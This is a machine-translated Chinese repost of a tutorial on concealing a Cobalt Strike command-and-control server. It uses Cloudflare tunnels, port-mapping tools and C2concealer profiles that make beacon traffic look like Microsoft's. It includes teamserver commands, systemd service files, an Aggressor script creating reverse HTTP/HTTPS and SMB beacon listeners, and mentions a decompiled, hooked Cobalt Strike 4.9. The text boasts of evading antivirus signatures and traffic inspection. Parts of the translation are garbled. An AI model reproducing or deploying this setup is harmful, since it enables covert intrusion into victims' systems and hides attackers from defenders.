隐藏 CobaltStrike PRO使用CloudFlared Tunnel和Microsoft 100 Traffic%隐藏您的CobaltStrike 终于在这里看到了新的CobaltStrike观众(祝大家好运),我还在等管理员允许我们发布上一次比赛中关于CS的一些材料。这样,这里的所有人都可以学会如何正确使用它;现在我们必须专注于在使用此工具时尽可能地隐藏自己,使其复杂化并像专业人士一样连接!
Cobaltstrike 4.9末尾附带的源代码是反编译的cs4.9。其中有很多洞,主要是由于反编译代码中的语法错误导致编译错误的问题。手动更改了大部分反编译导致的语法错误。一小部分位置代码更改比较复杂,直接进行注释处理,调用原始jar函数实现,这并不影响功能的使用。如果要在第二次打开时更改位置,可以取消注释并更改位置代码以实现第二次打开。
-XX:+AggressiveHeap -XX:+UseParallelGC -javaagent:hook.jar
-
个人资料 – 例如:google.com、Amazon、microsoft.com 等。 -
您的 IP/主机/域名 -
灯塔上线了!
https://support.cloudflare.com/hc/en-us/articles/201720164-Creating-a-Cloudflare-account-and-adding-a-website让我们来看看使用域名重定向器等隐藏信标的所有旧技术。现在我们将发布如何让您的信标“一文不值”!
我们需要完成这3件隐藏的事情;
-
cloudflare – 隧道
-
ding argo –
-
cobalt strike 4.x 互联网渗透工具
./teamserver.sh ip-адрес microsoft.profile
我们的枪已装好弹药,正在使用 Microsoft.profile 监听我们的动静
安装 cloudflare 也和你想象的一样简单!要安装 .deb 包,只需运行;Debian / Ubuntu
// Ubuntu、Linux Mint
wget -q https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64.debdpkg -i cloudflared-linux-amd64.debcloudflared status
// CentOS、Fedora、RHEL
wget -q https://bin.equinox.io/c/VdrWdbjqyF/cloudflared-stable-linux-amd64.rpmrpm -ivh cloudflared-stable-linux-amd64.rpm
//docker
https://hub.docker.com/r/cloudflare/cloudflareddocker run cloudflare/cloudflared:2020.7.0 tunnel --no-autoupdate --hello-world
// 苹果系统
$ brew install cloudflare/cloudflare/cloudflaredcloudflared tunnel --url 127.0.0.1:31337cloudflare 现在已经完成了我们私人钴攻击隧道的任务;(https://assisted-same-*.trycloudflare.com );让我们映射我们的内部端口来捕获目标;
./ding -config=./ding.cfg -subdomain= 31337适用于 Windows/Linux/Mac OS 的 bing
https://github.com/open-dingtalk/pierced/tree/master/linux现在是重要的部分;我们在这里用 cloudflare 监听器所做的事情,我们需要用你的 ding 或任何其他映射工具来做;让我们获取 cloudflare 地址并准备我们的隧道;
现在为 cloudflared IP 地址和内部端口 31337 配置监听器
让我们将信标连接到网络!
在线的!
现在不要忘记,我们的信标是结合在 cloudflare 隧道和 C2concealer 配置文件(Microsoft)之间的,它将向客户端显示我们位于 cloudflare 的 IP 地址,而 wireshark 隧道显示微软;据您想象,在东方准备 C2concealer 配置文件;
只需按照此处的 repo https://github.com/FortyNorthSecurity/C2concealer 或运行以下命令;
C2 concealer 是一个 python 3 命令行工具,可创建灵活的 c2 配置文件以供 Cobalt Strike 使用,您想快速启动并运行吗?
使用示例:
Usage:$ c2concealer --hostname google.com --variant 3Flags:(optional)--hostnameThe hostname used in HTTP client and server side settings. Default is None.--variantAn integer defining the number of HTTP client/server variants to generate. Recommend between 1 and 5. Max 10.
输出到控制台:
git clone https://github.com/FortyNorthSecurity/C2concealerchmod u+x install.sh./install.sh
您需要选择 SSL 选项。首次运行该工具时,只需选择“4”即可了解该工具的工作原理。选项“2”要求您为您管理的域设置 A 记录,并将其指向您正在运行该工具的计算机的 IP 地址。这是因为该工具将下载 certbot 并使用 LetsEncrypt 自动启动 ACME 协议来创建用于即时评估的证书。选项“3”需要密钥库的路径(您可以在选项卡上填写此路径)。
选择 SSL 选项后,该工具应该简单地输出验证结果并将配置文件保存在当前工作目录中。
配置c2concealer:
-
使用此工具的最佳方法是通过向默认字典和数据列表添加附加值和/或其他值使其成为您自己的工具。
-
该工具的结构允许用户在多个位置更改默认数据属性。首先,您会在 /c2concealer/data/ subdirectory.py 中找到几个文件,其中包含默认值的列表和词典。跳转到那里并更改您认为合适的任何内容。
dns.py (setting up dns subdomains)file_type_prepend.py (customize the appearance of the http get server responses... it's also the c2 management instructions)params.py (two dictionaries containing common parameter names and a common list of words)post_ex.py (the list of spawn_to processes...definitely change this one)reg_headers.py (typical http headers such as user agent and server)smb.py (smb channel names to use when sending messages via SMS)stage.py (data for changing locks related to the scene)transform.py (transformations payload data...no need to change this)urls.py (the file types and URL path components used to create URLs throughout the tool...definitely change that)
其次,
您可以在配置文件创建过程中自定义各种属性。例如,在文件“/c2concealer/components/stageblock.py”中,您可以更改 PE 图像大小值的范围(大约第 73-74 行)。请查看组件目录中的所有不同文件。
如果我不想添加自己的值怎么办?
一切都井然有序。它每次仍会生成随机配置文件。最终,AV 供应商可以浏览存储库并根据这些默认值创建签名,但目前你应该没问题。
对于让我们使用 microsoft.com 网络活动加密免费 SSL 以悄悄隐藏我们的 c2 主机,最佳选项 #2。
将 Cobalstrike Teamserver 作为服务启动
这些脚本可用作将团队服务器配置为服务和自动运行监听器的模板。
这些场景已在 Ubuntu 服务器上进行了测试,需要根据您的使用情况进行调整。
对于 cloudflare;我们需要创建此文件以在重启时自动启动服务:
请务必根据您的环境更新服务文件。
将服务文件复制到您团队的服务器,并根据您的服务器指定修复位置;
-
teamserver.service
-
listener.service
-
listener_service.cna
-
cloudflared.service
-
cloudflared
/etc/systemd/system/teamserver.service/etc/systemd/system/listener.service/etc/systemd/system/cloudflared.service/etc/your-cobaltstrike-location/listener_service.cna/etc/default/cloudflared
sudo nano /etc/default/cloudflared
COBALTSTRIKE_DSAS_INJECT.DEV=--port 5353 --upstream https://1.1.1.1/dns-query --upstream https://1.0.0.1/dns-querysudo nano /etc/systemd/system/cloudflared.service
[Unit]Description=cloudflared DNS over HTTPS proxyAfter=syslog.target network-online.target[Service]Type=simpleUser=cloudflaredEnvironmentFile=/etc/default/cloudflaredExecStart=/usr/local/bin/cloudflared proxy-dns $COBALTSTRIKE_DSAS_INJECT.DEVRestart=on-failureRestartSec=10KillMode=process[Install]WantedBy=multi-user.target
启用 systemd 服务在启动时运行,然后启动该服务并检查其状态:
注册新服务
systemclt daemon-reload启动服务
ystemctl start teamserver.servicesystemctl start listener.servicesystemctl start cloudflared.service
检查服务
sudo systemctl enable cloudflaredsudo systemctl status cloudflared sudo systemctl status teamserver.service
// 团队服务器服务
更新设置以适合您的环境。
工作目录:安装在 cobalt strike 目录中
ExecStart:设置您的值
# teamserver.service[Unit]Description=Cobalt Strike Teamserver Service & Argo tunnel service!After=network.targetWants=network.target[Service]Type=SimpleWorkingDirectory=/your-cobaltstrike-locationExecStart=/opt/your-cobaltstrike-location/teamserver <TEAMSERVER IP> <PASSWORD> <PATH TO C2 PROFILE># Example# ExecStart=/opt/your-cobaltstrike-location/teamserver hostname -I thisismypassword /opt/cobaltstrike/c2.profile[Install]WantedBy=multi-user.target
聆听服务
更新设置以适合您的环境。
工作目录:安装在 cobalt strike 目录中
ExecStart:设置您的值
# listener.service[Unit]Description=Cobalt Strike aggressor service & argo Tunnel service!After=teamserver.service network.targetWants=teamserver.serviceStartLimitIntervalSec=33[Service]Restart=on-failureRestartSec=10WorkingDirectory=/your-cobaltstrike-locationExecStartPre=/bin/sleep 60ExecStart=/bin/bash /opt/your-cobaltstrike-location/agscript 127.0.0.1 50050 <USER to LOGON TO COBALTSTRIKE> <TEAMSERVER PASSWORD> <PATH TO listener_service.cna># Example# ExecStart=/bin/bash /opt/your-cobaltstrike-location/agscript 127.0.0.1 50050 listener_service thisismypassword /opt/cobaltstrike/listener_service.cna[Install]WantedBy=multi-user.target
无头侵略者的情景
这应该被更新以反映您的环境。
此攻击者脚本示例用于启动 HTTP、HTTPS 和 SMB 侦听器以及所有必要参数
HTTP 侦听器
-
Name
-
Listening host
-
althost
HTTP 侦听器
-
Name
-
Listening host
-
althost
println("###################################################################CobaltStrike Aggressor ScriptAuthor: Joe VestDescription: Headless script to create listeners###################################################################");println('Loading listener_service.cna...');on ready{println('listener_service.cna: Creating HTTP Listener...');listener_create_ext("HTTP", "windows/beacon_http/reverse_http", %(host => "iheartredteams.com", port => 80, beacons => "iheartredteams.com", althost => "iheartredteams.com", bindto => 80));println('listener_service.cna: Creating HTTPS Listener...');listener_create_ext("HTTPS", "windows/beacon_https/reverse_https", %(host => "iheartredteams.com", port => 443, beacons => "iheartredteams.com", althost => "iheartredteams.com", bindto => 443));println('listener_service.cna: Creating SMB Listener...');listener_create_ext("SMB", "windows/beacon_bind_pipe", %(port => "mojo.5887.8051.34782273429370473##"));sleep(10000);}
https://blog.injectexp.dev/hide-cobaltstrike-pro/02/cobaltstrike/原文始发于微信公众号(Ots安全):隐藏 Cobalt Strike PRO
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论